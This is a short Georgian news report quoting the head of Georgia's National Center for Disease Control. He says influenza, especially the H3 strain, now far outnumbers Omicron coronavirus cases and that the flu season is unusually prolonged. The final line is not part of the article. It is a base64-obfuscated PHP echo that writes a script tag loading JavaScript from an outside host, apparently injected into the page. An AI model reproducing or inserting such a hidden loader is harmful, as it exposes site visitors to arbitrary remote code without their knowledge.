celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელის, ამირან გამყრელიძის ინფორმაციით, ქვეყანაში გრიპის ვირუსის გავრცელება ბევრად სჭარბობს კორონავირუსს.
 
როგორც მან „ინტერპრესნიუსთან“ საუბრისას აღნიშნა, 2008-2009 წლის შემდეგ გრიპის ვირუსის ცირკულაციის სეზონური გახანგრძლივება ქვეყანაში არ გვქონია.
 
„მოგეხსენებათ, კოვიდპანდემიის პერიოდში რესპირაციული ვირუსების გავრცელების დინამიკამ გარკვეული სახეცვლილება განიცადა. 2020 წელს გრიპი თითქმის არ იყო, ახალმა კორონავირუსმა "დაჩაგრა" გრიპი და ნაკლებად შეაწუხა მოსახლეობა. 2021 წელსაც ეს დინამიკა გაგრძელდა. 2022 წელს კი სახე იცვალა რესპირაციული ვირუსების გავრცელებამ. რესპირაციული ვირუსები, კერძოდ, გრიპის, რინოვირუსი, სინციტიური ვირუსი და სხვა, ყოველი წლის შემოდგომის მეორე ნახევრიდან, გაზაფხულის მარტის ბოლომდე ცირკულირებდნენ. მას შემდეგ, რაც „ომიკრონი“ გამოჩნდა, ისევე იმატა სხვა რესპირაციული ვირუსების დინამიკამ.
 
დაავადებათა კონტროლის ეროვნული ცენტრი სხვადასხვა მეთოდით აკვირდება რესპირაციული ვირუსის გავრცელებას. თქვენ ნახავთ, რომ 2022 წელს სხვა ვირუსების მიმდინარეობა უჩვეულოდ გაგრძელდა. 2008-2009 წლის შემდეგ გრიპის ცირკულაციის ასეთი სეზონური გახანგრძლივება არ გვქონია. კერძოდ, ცირკულირებს: გრიპი, განსაკუთრებით H3-ის შტამი, რინოვირუსი, სხვა კორონავირუსები და არა ახალი კორონავირუსი, ასევე ე.წ. პარაგრიპები, რესპირაციულ-სინციტიური ვირუსი, ადენოვურსი და სხვა.
 
ჩვენ მონაცემებს თუ შევხედავთ, ვნახავთ, რომ ახლა გრიპის ვირუსის გავრცელება ბევრად სჭარბობს კორონავირუსის გავრცელებას, უფრო მეტი გრიპის ვირუსი ცირკულირებს, ვიდრე კორონავირუსის „ომიკრონი“, თუმცა ეს პანიკის საბაბს არ იძლევა“, - აღნიშნავს გამყრელიძე.
662
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");